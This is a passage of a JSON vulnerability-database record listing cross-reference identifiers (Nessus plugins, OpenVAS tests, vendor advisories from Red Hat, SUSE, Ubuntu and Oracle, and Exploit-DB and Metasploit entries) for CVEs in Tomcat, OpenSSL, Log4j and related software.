"ORACLELINUX_ELSA-2016-0722.NASL", "ORACLELINUX_ELSA-2016-0996.NASL", "ORACLELINUX_ELSA-2016-1940.NASL", "ORACLELINUX_ELSA-2016-3556.NASL", "ORACLELINUX_ELSA-2016-3558.NASL", "ORACLELINUX_ELSA-2016-3571.NASL", "ORACLELINUX_ELSA-2016-3621.NASL", "ORACLELINUX_ELSA-2017-1100.NASL", "ORACLELINUX_ELSA-2017-1101.NASL", "ORACLELINUX_ELSA-2017-2423.NASL", "ORACLELINUX_ELSA-2017-2882.NASL", "ORACLELINUX_ELSA-2017-2972.NASL", "ORACLELINUX_ELSA-2017-3080.NASL", "ORACLELINUX_ELSA-2017-3081.NASL", "ORACLELINUX_ELSA-2022-9419.NASL", "ORACLEVM_OVMSA-2016-0049.NASL", "ORACLEVM_OVMSA-2016-0135.NASL", "ORACLE_ACCESS_MANAGER_CPU_JAN_2018.NASL", "ORACLE_BI_PUBLISHER_APR_2018_CPU.NASL", "ORACLE_BI_PUBLISHER_APR_2020_CPU.NASL", "ORACLE_BI_PUBLISHER_JAN_2018_CPU.NASL", "ORACLE_BI_PUBLISHER_OCT_2018_CPU.NASL", "ORACLE_E-BUSINESS_CPU_JUL_2017.NASL", "ORACLE_E-BUSINESS_CPU_OCT_2016.NASL", "ORACLE_ENTERPRISE_MANAGER_APR_2017_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JAN_2017_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2016_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2017_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2018_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JUL_2020_CPU_UI.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_JAN_2019.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_OCT_2018.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_JAN_2018.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_OCT_2018.NASL", "ORACLE_JDEVELOPER_CPU_JAN_2018.NASL", "ORACLE_JDEVELOPER_CPU_JUL_2018.NASL", "ORACLE_OATS_CPU_APR_2016.NASL", "ORACLE_OATS_CPU_JUL_2018.NASL", "ORACLE_OATS_CPU_JUL_2020.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_APR_2019.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_APR_2019.NASL", "ORACLE_RDBMS_CPU_JAN_2018.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2017_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_JAN_2018_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_JUL_2016_CPU.NASL", "ORACLE_WEBCENTER_CONTENT_JAN_2018_CPU.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_JAN_2018.NBIN", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2018.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2018.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2020.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2016.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "PFSENSE_SA-16_04.NASL", "PVS_5_2_0.NASL", "REDHAT-RHSA-2015-2500.NASL", "REDHAT-RHSA-2015-2521.NASL", "REDHAT-RHSA-2015-2522.NASL", "REDHAT-RHSA-2015-2535.NASL", "REDHAT-RHSA-2015-2536.NASL", "REDHAT-RHSA-2015-2538.NASL", "REDHAT-RHSA-2015-2539.NASL", "REDHAT-RHSA-2015-2540.NASL", "REDHAT-RHSA-2015-2542.NASL", "REDHAT-RHSA-2015-2671.NASL", "REDHAT-RHSA-2016-0722.NASL", "REDHAT-RHSA-2016-0996.NASL", "REDHAT-RHSA-2016-1773.NASL", "REDHAT-RHSA-2016-1940.NASL", "REDHAT-RHSA-2016-2073.NASL", "REDHAT-RHSA-2017-1100.NASL", "REDHAT-RHSA-2017-1101.NASL", "REDHAT-RHSA-2017-1102.NASL", "REDHAT-RHSA-2017-1103.NASL", "REDHAT-RHSA-2017-1801.NASL", "REDHAT-RHSA-2017-2423.NASL", "REDHAT-RHSA-2017-2635.NASL", "REDHAT-RHSA-2017-2636.NASL", "REDHAT-RHSA-2017-2637.NASL", "REDHAT-RHSA-2017-2638.NASL", "REDHAT-RHSA-2017-2808.NASL", "REDHAT-RHSA-2017-2809.NASL", "REDHAT-RHSA-2017-2811.NASL", "REDHAT-RHSA-2017-2882.NASL", "REDHAT-RHSA-2017-2972.NASL", "REDHAT-RHSA-2017-3080.NASL", "REDHAT-RHSA-2017-3081.NASL", "REDHAT-RHSA-2017-3113.NASL", "REDHAT-RHSA-2017-3193.NASL", "REDHAT-RHSA-2017-3194.NASL", "REDHAT-RHSA-2017-3195.NASL", "REDHAT-RHSA-2017-3240.NASL", "REDHAT-RHSA-2017-3399.NASL", "REDHAT-RHSA-2017-3476.NASL", "REDHAT-RHSA-2017-3477.NASL", "REDHAT-RHSA-2018-0268.NASL", "REDHAT-RHSA-2018-0270.NASL", "REDHAT-RHSA-2018-0275.NASL", "REDHAT-RHSA-2018-0466.NASL", "REDHAT-RHSA-2018-2185.NASL", "REDHAT-RHSA-2018-2186.NASL", "REDHAT-RHSA-2018-2568.NASL", "REDHAT-RHSA-2018-2575.NASL", "REDHAT-RHSA-2018-2713.NASL", "REDHAT-RHSA-2020-4274.NASL", "SECURITYCENTER_5_4_3_TNS_2017_04.NASL", "SECURITYCENTER_OPENSSL_1_0_1U.NASL", "SECURITYCENTER_OPENSSL_1_0_2K.NASL", "SLACKWARE_SSA_2016-124-01.NASL", "SLACKWARE_SSA_2016-266-01.NASL", "SLACKWARE_SSA_2017-041-02.NASL", "SLACKWARE_SSA_2017-261-01.NASL", "SL_20151130_APACHE_COMMONS_COLLECTIONS_ON_SL7_X.NASL", "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "SL_20151221_JAKARTA_COMMONS_COLLECTIONS_ON_SL5_X.NASL", "SL_20160509_OPENSSL_ON_SL7_X.NASL", "SL_20160510_OPENSSL_ON_SL6_X.NASL", "SL_20160927_OPENSSL_ON_SL6_X.NASL", "SL_20170420_NSS_AND_NSS_UTIL_ON_SL6_X.NASL", "SL_20170420_NSS_UTIL_ON_SL6_X.NASL", "SL_20170807_LOG4J_ON_SL7_X.NASL", "SL_20171011_HTTPD_ON_SL7_X.NASL", "SL_20171019_HTTPD_ON_SL6_X.NASL", "SL_20171030_TOMCAT6_ON_SL6_X.NASL", "SL_20171030_TOMCAT_ON_SL7_X.NASL", "SOLARIS10_142824-29.NASL", "SPLUNK_642.NASL", "SUN_JAVA_WEB_SERVER_7_0_27.NASL", "SUSE_SU-2016-1228-1.NASL", "SUSE_SU-2016-1233-1.NASL", "SUSE_SU-2016-2387-1.NASL", "SUSE_SU-2016-2394-1.NASL", "SUSE_SU-2016-2458-1.NASL", "SUSE_SU-2016-2468-1.NASL", "SUSE_SU-2017-0431-1.NASL", "SUSE_SU-2017-0441-1.NASL", "SUSE_SU-2017-0855-1.NASL", "SUSE_SU-2017-1175-1.NASL", "SUSE_SU-2017-1248-1.NASL", "SUSE_SU-2017-1669-1.NASL", "SUSE_SU-2017-2235-1.NASL", "SUSE_SU-2017-2542-1.NASL", "SUSE_SU-2017-2718-1.NASL", "SUSE_SU-2017-2756-1.NASL", "SUSE_SU-2017-2907-1.NASL", "SUSE_SU-2017-3343-1.NASL", "SUSE_SU-2018-2839-1.NASL", "SUSE_SU-2018-2839-2.NASL", "SUSE_SU-2018-3082-1.NASL", "SUSE_SU-2021-14705-1.NASL", "TOMCAT_6_0_24.NASL", "TOMCAT_7_0_81.NASL", "TOMCAT_7_0_82.NASL", "TOMCAT_8_0_47.NASL", "TOMCAT_8_5_23.NASL", "TOMCAT_9_0_1.NASL", "TOMCAT_PUT_JSP.NASL", "UBUNTU_USN-2959-1.NASL", "UBUNTU_USN-3087-1.NASL", "UBUNTU_USN-3087-2.NASL", "UBUNTU_USN-3181-1.NASL", "UBUNTU_USN-3260-1.NASL", "UBUNTU_USN-3260-2.NASL", "UBUNTU_USN-3270-1.NASL", "UBUNTU_USN-3278-1.NASL", "UBUNTU_USN-3425-1.NASL", "UBUNTU_USN-3665-1.NASL", "UBUNTU_USN-3727-1.NASL", "VIRTUALBOX_5_0_22.NASL", "VIRTUOZZO_VZLSA-2017-1100.NASL", "VIRTUOZZO_VZLSA-2017-2972.NASL", "VIRTUOZZO_VZLSA-2017-3080.NASL", "VMWARE_ESXI_6_0_BUILD_5485776_REMOTE.NASL", "WEBSPHERE_711865.NASL", "WEB_APPLICATION_SCANNING_112310"]}, {"type": "nodejsblog", "idList": ["NODEJSBLOG:OPENSSL-JANUARY-2017", "NODEJSBLOG:OPENSSL-MAY-2016", "NODEJSBLOG:SEPTEMBER-2016-SECURITY-RELEASES"]}, {"type": "nuclei", "idList": ["NUCLEI:\"CVE-2017-12617\""]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2016-2107", "OPENSSL:CVE-2016-2179", "OPENSSL:CVE-2017-3732", "OPENSSL:CVE-2017-3738"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105732", "OPENVAS:1361412562310105828", "OPENVAS:1361412562310106262", "OPENVAS:1361412562310106267", "OPENVAS:1361412562310106356", "OPENVAS:1361412562310106390", "OPENVAS:1361412562310106949", "OPENVAS:1361412562310107048", "OPENVAS:1361412562310107049", "OPENVAS:1361412562310107141", "OPENVAS:1361412562310108252", "OPENVAS:1361412562310108772", "OPENVAS:1361412562310112048", "OPENVAS:1361412562310120608", "OPENVAS:1361412562310120684", "OPENVAS:1361412562310120744", "OPENVAS:1361412562310122791", "OPENVAS:1361412562310122792", "OPENVAS:1361412562310122924", "OPENVAS:1361412562310131170", "OPENVAS:1361412562310131177", "OPENVAS:1361412562310131285", "OPENVAS:1361412562310140019", "OPENVAS:1361412562310140047", "OPENVAS:1361412562310140168", "OPENVAS:1361412562310141826", "OPENVAS:1361412562310143949", "OPENVAS:1361412562310703417", "OPENVAS:1361412562310703566", "OPENVAS:1361412562310703673", "OPENVAS:1361412562310703831", "OPENVAS:1361412562310703872", "OPENVAS:1361412562310703980", "OPENVAS:1361412562310807351", "OPENVAS:1361412562310807569", "OPENVAS:1361412562310807570", "OPENVAS:1361412562310807997", "OPENVAS:1361412562310808016", "OPENVAS:1361412562310808029", "OPENVAS:1361412562310808374", "OPENVAS:1361412562310808407", "OPENVAS:1361412562310808523", "OPENVAS:1361412562310808530", "OPENVAS:1361412562310808538", "OPENVAS:1361412562310809417", "OPENVAS:1361412562310809478", "OPENVAS:1361412562310809955", "OPENVAS:1361412562310810227", "OPENVAS:1361412562310810542", "OPENVAS:1361412562310810751", "OPENVAS:1361412562310810752", "OPENVAS:1361412562310810756", "OPENVAS:1361412562310810758", "OPENVAS:1361412562310810760", "OPENVAS:1361412562310810761", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811440", "OPENVAS:1361412562310811441", "OPENVAS:1361412562310811854", "OPENVAS:1361412562310812035", "OPENVAS:1361412562310812045", "OPENVAS:1361412562310812057", "OPENVAS:1361412562310812058", "OPENVAS:1361412562310812401", "OPENVAS:1361412562310812959", "OPENVAS:1361412562310812960", "OPENVAS:1361412562310814409", "OPENVAS:1361412562310842729", "OPENVAS:1361412562310842896", "OPENVAS:1361412562310842898", "OPENVAS:1361412562310843029", "OPENVAS:1361412562310843135", "OPENVAS:1361412562310843145", "OPENVAS:1361412562310843157", "OPENVAS:1361412562310843171", "OPENVAS:1361412562310843313", "OPENVAS:1361412562310843539", "OPENVAS:1361412562310843603", "OPENVAS:1361412562310851127", "OPENVAS:1361412562310851289", "OPENVAS:1361412562310851295", "OPENVAS:1361412562310851297", "OPENVAS:1361412562310851299", "OPENVAS:1361412562310851337", "OPENVAS:1361412562310851397", "OPENVAS:1361412562310851399", "OPENVAS:1361412562310851412", "OPENVAS:1361412562310851540", "OPENVAS:1361412562310851651", "OPENVAS:1361412562310851665", "OPENVAS:1361412562310851703", "OPENVAS:1361412562310851734", "OPENVAS:1361412562310871511", "OPENVAS:1361412562310871512", "OPENVAS:1361412562310871529", "OPENVAS:1361412562310871610", "OPENVAS:1361412562310871614", "OPENVAS:1361412562310871663", "OPENVAS:1361412562310871803", "OPENVAS:1361412562310871877", "OPENVAS:1361412562310871989", "OPENVAS:1361412562310872342", "OPENVAS:1361412562310872359", "OPENVAS:1361412562310872637", "OPENVAS:1361412562310872638", "OPENVAS:1361412562310872757", "OPENVAS:1361412562310872759", "OPENVAS:1361412562310873446", "OPENVAS:1361412562310873711", "OPENVAS:1361412562310873766", "OPENVAS:1361412562310874436", "OPENVAS:1361412562310882333", "OPENVAS:1361412562310882486", "OPENVAS:1361412562310882566", "OPENVAS:1361412562310882569", "OPENVAS:1361412562310882698", "OPENVAS:1361412562310882701", "OPENVAS:1361412562310882702", "OPENVAS:1361412562310882704", "OPENVAS:1361412562310882784", "OPENVAS:1361412562310882791", "OPENVAS:1361412562310882795", "OPENVAS:1361412562310882796", "OPENVAS:1361412562310890906", "OPENVAS:1361412562310890946", "OPENVAS:1361412562310891102", "OPENVAS:1361412562311220161047", "OPENVAS:1361412562311220171075", "OPENVAS:1361412562311220171076", "OPENVAS:1361412562311220171213", "OPENVAS:1361412562311220171214", "OPENVAS:1361412562311220171252", "OPENVAS:1361412562311220171253", "OPENVAS:1361412562311220171261", "OPENVAS:1361412562311220171262", "OPENVAS:1361412562311220191389", "OPENVAS:1361412562311220191419", "OPENVAS:1361412562311220201420", "OPENVAS:1361412562311220201637", "OPENVAS:703417", "OPENVAS:703566", "OPENVAS:703673", "OPENVAS:703831", "OPENVAS:703872"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2017", "ORACLE:CPUAPR2018", "ORACLE:CPUAPR2019", "ORACLE:CPUAPR2020", "ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUJAN2017", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2016", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2019", "ORACLE:CPUOCT2020", "ORACLE:CPUOCT2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-2521", "ELSA-2015-2522", "ELSA-2015-2671", "ELSA-2016-0722", "ELSA-2016-0996", "ELSA-2016-1940", "ELSA-2016-3556", "ELSA-2016-3558", "ELSA-2016-3571", "ELSA-2016-3621", "ELSA-2017-1100", "ELSA-2017-1101", "ELSA-2017-2423", "ELSA-2017-2882", "ELSA-2017-2972", "ELSA-2017-3080", "ELSA-2017-3081", "ELSA-2019-4581", "ELSA-2019-4747", "ELSA-2021-9150", "ELSA-2022-9419"]}, {"type": "osv", "idList": ["OSV:CVE-2016-2107", "OSV:CVE-2016-2179", "OSV:DLA-361-1", "OSV:DLA-456-1", "OSV:DLA-637-1", "OSV:DLA-906-1", "OSV:DLA-946-1", "OSV:DSA-3566-1", "OSV:DSA-3673-1", "OSV:DSA-3673-2", "OSV:GHSA-4MV7-CQ75-3QJM", "OSV:GHSA-5GGR-MPGW-3MGX", "OSV:GHSA-FJQ5-5J5F-MVXH", "OSV:GHSA-FXPH-Q3J8-MV87", "OSV:GHSA-XJGH-84HX-56C5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143369", "PACKETSTORM:144557", "PACKETSTORM:144591", "PACKETSTORM:145966"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0020", "PAN-SA-2016-0023"]}, {"type": "photon", "idList": ["PHSA-2017-0077", "PHSA-2017-0078"]}, {"type": "prion", "idList": ["PRION:CVE-2015-7501", "PRION:CVE-2015-7940", "PRION:CVE-2016-0635", "PRION:CVE-2016-1182", "PRION:CVE-2016-2107", "PRION:CVE-2016-2179", "PRION:CVE-2017-10068", "PRION:CVE-2017-10262", "PRION:CVE-2017-10273", "PRION:CVE-2017-10352", "PRION:CVE-2017-12617", "PRION:CVE-2017-3732", "PRION:CVE-2017-3738", "PRION:CVE-2017-5461", "PRION:CVE-2017-5645", "PRION:CVE-2017-9798", "PRION:CVE-2018-2561", "PRION:CVE-2018-2564", "PRION:CVE-2018-2584", "PRION:CVE-2018-2596", "PRION:CVE-2018-2601", "PRION:CVE-2018-2625", "PRION:CVE-2018-2711", "PRION:CVE-2018-2713", "PRION:CVE-2018-2715", "PRION:CVE-2018-2760"]}, {"type": "redhat", "idList": ["RHSA-2015:2500", "RHSA-2015:2501", "RHSA-2015:2502", "RHSA-2015:2514", "RHSA-2015:2516", "RHSA-2015:2517", "RHSA-2015:2521", "RHSA-2015:2522", "RHSA-2015:2523", "RHSA-2015:2524", "RHSA-2015:2534", "RHSA-2015:2535", "RHSA-2015:2536", "RHSA-2015:2537", "RHSA-2015:2538", "RHSA-2015:2539", "RHSA-2015:2540", "RHSA-2015:2542", "RHSA-2015:2547", "RHSA-2015:2556", "RHSA-2015:2557", "RHSA-2015:2559", "RHSA-2015:2560", "RHSA-2015:2578", "RHSA-2015:2579", "RHSA-2015:2670", "RHSA-2015:2671", "RHSA-2016:0040", "RHSA-2016:0118", "RHSA-2016:0722", "RHSA-2016:0996", "RHSA-2016:1773", "RHSA-2016:1940", "RHSA-2016:2035", "RHSA-2016:2036", "RHSA-2016:2073", "RHSA-2016:2957", "RHSA-2017:1100", "RHSA-2017:1101", "RHSA-2017:1102", "RHSA-2017:1103", "RHSA-2017:1417", "RHSA-2017:1801", "RHSA-2017:1802", "RHSA-2017:2423", "RHSA-2017:2633", "RHSA-2017:2635", "RHSA-2017:2636", "RHSA-2017:2637", "RHSA-2017:2638", "RHSA-2017:2808", "RHSA-2017:2809", "RHSA-2017:2810", "RHSA-2017:2811", "RHSA-2017:2882", "RHSA-2017:2888", "RHSA-2017:2889", "RHSA-2017:2972", "RHSA-2017:3018", "RHSA-2017:3080", "RHSA-2017:3081", "RHSA-2017:3113", "RHSA-2017:3114", "RHSA-2017:3193", "RHSA-2017:3194", "RHSA-2017:3195", "RHSA-2017:3239", "RHSA-2017:3240", "RHSA-2017:3244", "RHSA-2017:3399", "RHSA-2017:3400", "RHSA-2017:3475", "RHSA-2017:3476", "RHSA-2017:3477", "RHSA-2018:0268", "RHSA-2018:0269", "RHSA-2018:0270", "RHSA-2018:0271", "RHSA-2018:0275", "RHSA-2018:0465", "RHSA-2018:0466", "RHSA-2018:2185", "RHSA-2018:2186", "RHSA-2018:2187", "RHSA-2018:2568", "RHSA-2018:2575", "RHSA-2018:2713", "RHSA-2018:2939", "RHSA-2019:1545", "RHSA-2020:4274", "RHSA-2021:3140"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-1182", "RH:CVE-2016-2107", "RH:CVE-2016-2179", "RH:CVE-2017-12617", "RH:CVE-2017-3738", "RH:CVE-2017-5461", "RH:CVE-2017-5645", "RH:CVE-2017-9798", "RH:CVE-2019-17571"]}, {"type": "seebug", "idList": ["SSV:89999", "SSV:91448", "SSV:92965", "SSV:96537", "SSV:96624"]}, {"type": "slackware", "idList": ["SSA-2016-124-01", "SSA-2016-266-01", "SSA-2017-041-02", "SSA-2017-261-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:1911-1", "OPENSUSE-SU-2016:1237-1", "OPENSUSE-SU-2016:1238-1", "OPENSUSE-SU-2016:1240-1", "OPENSUSE-SU-2016:1243-1", "OPENSUSE-SU-2016:1566-1", "OPENSUSE-SU-2016:2391-1", "OPENSUSE-SU-2016:2407-1", "OPENSUSE-SU-2016:2537-1", "OPENSUSE-SU-2017:1099-1", "OPENSUSE-SU-2017:3069-1", "OPENSUSE-SU-2017:3345-1", "OPENSUSE-SU-2018:0458-1", "OPENSUSE-SU-2018:1057-1", "SUSE-SU-2016:1206-1", "SUSE-SU-2016:1228-1", "SUSE-SU-2016:1233-1", "SUSE-SU-2016:2387-1", "SUSE-SU-2016:2394-1", "SUSE-SU-2016:2458-1", "SUSE-SU-2016:2468-1", "SUSE-SU-2016:2469-1", "SUSE-SU-2017:1175-1", "SUSE-SU-2017:1248-1", "SUSE-SU-2017:1669-1", "SUSE-SU-2017:2235-1", "SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1", "SUSE-SU-2017:2701-1", "SUSE-SU-2017:3039-1", "SUSE-SU-2017:3059-1", "SUSE-SU-2017:3279-1", "SUSE-SU-2017:3343-1"]}, {"type": "symantec", "idList": ["SMNTC-1363", "SMNTC-1382", "SMNTC-1395", "SMNTC-1405", "SMNTC-1419", "SMNTC-1457", "SMNTC-97702"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387"]}, {"type": "thn", "idList": ["THN:7CACCDBBDB47286572F59C67E92AF821", "THN:96A25F981DD18505C101D0FC9DAA7B30"]}, {"type": "threatpost", "idList": ["THREATPOST:C67169E038FB8F98C9DE037029EB7D5A", "THREATPOST:CF8A831748EC23AA2B67F64081A55155"]}, {"type": "tomcat", "idList": ["TOMCAT:36AC55F275AD6FE594625DBE3DFC1A1C", "TOMCAT:5322371A63B432FEA04126BDF7D1223B", "TOMCAT:A7D3DCFDE9F8C13D1A85F195595ACE5C", "TOMCAT:D72CBF1EC8D17C51BF9944C1A031DFF0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A5BD476BF79F7E3854840596F916518C"]}, {"type": "ubuntu", "idList": ["USN-2959-1", "USN-3087-1", "USN-3087-2", "USN-3181-1", "USN-3260-1", "USN-3260-2", "USN-3270-1", "USN-3278-1", "USN-3372-1", "USN-3425-1", "USN-3425-2", "USN-3665-1", "USN-3727-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-4852", "UB:CVE-2015-7501", "UB:CVE-2015-7940", "UB:CVE-2016-1182", "UB:CVE-2016-2107", "UB:CVE-2016-2179", "UB:CVE-2017-12616", "UB:CVE-2017-12617", "UB:CVE-2017-3732", "UB:CVE-2017-3738", "UB:CVE-2017-5461", "UB:CVE-2017-5645", "UB:CVE-2017-9798"]}, {"type": "veracode", "idList": ["VERACODE:11857", "VERACODE:12415", "VERACODE:12485", "VERACODE:12689", "VERACODE:13434", "VERACODE:1847", "VERACODE:3347", "VERACODE:3426", "VERACODE:3670", "VERACODE:3919", "VERACODE:5354"]}, {"type": "zdt", "idList": ["1337DAY-ID-25990", "1337DAY-ID-28573", "1337DAY-ID-28759", "1337DAY-ID-28780", "1337DAY-ID-29579"]}]}, "score": {"value": 8.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-825", "ALAS-2017-896", "ALAS-2017-913"]}, {"type": "apple", "idList": ["APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:HT208331"]}, {"type": "archlinux", "idList": ["ASA-201704-4", "ASA-201705-21", "ASA-201709-15"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-64394", "ATLASSIAN:JRASERVER-65102"]}, {"type": "attackerkb", "idList": ["AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC", "AKB:FB2F65B2-D10B-4622-AEE6-41AAD3C1E6E7"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F"]}, {"type": "centos", "idList": ["CESA-2017:1100", "CESA-2017:2423", "CESA-2017:2882"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0774", "CPAI-2017-0779", "CPAI-2017-0827", "CPAI-2017-0896"]}, {"type": "cisa", "idList": ["CISA:6A3DB540F84D34B9BB99751624D91DB9"]}, {"type": "cisco", "idList": ["CISCO-SA-20170130-OPENSSL"]}, {"type": "citrix", "idList": ["CTX233832"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:F006390335E44CFEC69607A8E9BE3B62"]}, {"type": "cve", "idList": ["CVE-2015-7940", "CVE-2016-1182", "CVE-2016-2107", "CVE-2017-12617", "CVE-2017-5461", "CVE-2017-5645", "CVE-2017-9798", "CVE-2018-2760"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1102-1:7F277", "DEBIAN:DLA-1166-1:E77EB", "DEBIAN:DLA-637-1:F8314", "DEBIAN:DLA-906-1:D16E9", "DEBIAN:DLA-946-1:9FF89", "DEBIAN:DSA-3831-1:EE460", "DEBIAN:DSA-3872-1:C19C1", "DEBIAN:DSA-3980-1:C7ED3"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5645", "DEBIANCVE:CVE-2017-9798"]}, {"type": "dsquare", "idList": ["E-627"]}, {"type": "exploitdb", "idList": ["EDB-ID:42745", "EDB-ID:42953", "EDB-ID:42966", "EDB-ID:43008"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D"]}, {"type": "f5", "idList": ["F5:K12109859", "F5:K23173103", "F5:K53173544", "F5:K70084351", "SOL07538415"]}, {"type": "fedora", "idList": ["FEDORA:092E9605F081", "FEDORA:0AC1C60C76B5", "FEDORA:341EA6057129", "FEDORA:376506075014", "FEDORA:58BAF60A0C7C", "FEDORA:63AEC601CFBA", "FEDORA:76CFD605E21F", "FEDORA:A7FE360648D0", "FEDORA:A9847604E850", "FEDORA:A99066078F69", "FEDORA:DB25A6083B5B", "FEDORA:E150A6395ADF", "FEDORA:EFDAB6050C3B"]}, {"type": "fortinet", "idList": ["FG-IR-17-251"]}, {"type": "freebsd", "idList": ["01D729CA-1143-11E6-B55E-B499BAEBFEAF", "4CB165F0-6E48-423E-8147-92255D35C0F7", "5E0A038A-CA30-416D-A2F5-38CBF5E7DF33", "76B085E2-9D33-11E7-9260-000C292EE6B8", "C0DAE634-4820-4505-850D-B1C975D0F67D"]}, {"type": "gentoo", "idList": ["GLSA-201705-04"]}, {"type": "github", "idList": ["GHSA-FXPH-Q3J8-MV87"]}, {"type": "githubexploit", "idList": ["C2D99D6A-1A8C-5D55-BBB7-34A978AAC642"]}, {"type": "hackerone", "idList": ["H1:269568"]}, {"type": "httpd", "idList": ["HTTPD:7DDAAFDB1FD8B2E7FD36ADABA5DB6DAA"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170503-01-OPENSSL"]}, {"type": "ibm", "idList": ["1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "4278728D85C79F2084FC36711DAAF10C86E475C8E6940F2111DD155F1C48C0FA", "59AFB6B22B3D21FAFDC933DA29973F4C6887013B5320E839F5B0B140E8DDA7D1", "5D567CAC8B1B91B66CC85A1C9A61736F3CBA22497515DD3F0D18247FA0662627", "6F2C088BF5D78FB804760981ACFE38C9CC104BC5F9390812E5D324682512AD45", "79C9308A38227EABEE316B0407CBC46021561F829AEBF9659F93085D4FC63547", "7E4E851053AF5C2BFADF66AC8494971BF986538EB9E1BEE4C5D8B83D2DB1BBB0", "8451DCEAC7362310C8EAA923574AFEAD09CA58D139A870AE0ED1E3D11764573B", "9CCEB90B89301ED91DF7A501EF3103FD54D3AD611D342CF6E4B19E5105E84E35", "C3FB79ADA39B46791DCF93E4A2B6E50FE2792D0E382EF08036106CE4972770C2", "F0864C914EFB62F7C48822F52BDF423B57466738327736DD211AEFBE34B7C109", "F5D5AAF38F45575DCEBF7AD5E9B3D25AA8678ED2972A091BF0082B881BDC74A4", "F7862E3AFF4165C1E96904B0CC478B568FD7C29638F30D7255C5D201546C0450", "F96732014CC74E0CD212E2641AC086C0DBA609B9E2E61E3DC4259C4E401BE0FA", "FAA2B691DD1E76E786CADE53CD8A2391FDC6BE6F5B14624181F6008CE76C4E36", "FC2A12A3D5CDFFAEF50A77215E69039CD0E678811823B3B21F6B390DAB68C2C0"]}, {"type": "ics", "idList": ["ICSMA-20-184-01"]}, {"type": "kaspersky", "idList": ["KLA11118"]}, {"type": "kitploit", "idList": ["KITPLOIT:2973941148692546578"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED", "MSF:EXPLOIT/MULTI/HTTP/TOMCAT_JSP_UPLOAD_BYPASS", "MSF:ILITIES/SUSE-CVE-2017-5429/", "MSF:ILITIES/SUSE-CVE-2017-5430/", "MSF:ILITIES/SUSE-CVE-2017-5433/", "MSF:ILITIES/SUSE-CVE-2017-5435/", "MSF:ILITIES/SUSE-CVE-2017-5438/", "MSF:ILITIES/SUSE-CVE-2017-5439/", "MSF:ILITIES/SUSE-CVE-2017-5440/", "MSF:ILITIES/SUSE-CVE-2017-5442/", "MSF:ILITIES/SUSE-CVE-2017-5445/", "MSF:ILITIES/SUSE-CVE-2017-5447/", "MSF:ILITIES/SUSE-CVE-2017-5464/", "MSF:ILITIES/SUSE-CVE-2017-5467/", "MSF:ILITIES/SUSE-CVE-2017-5469/", "MSF:ILITIES/UBUNTU-CVE-2017-5429/", "MSF:ILITIES/UBUNTU-CVE-2017-5434/", 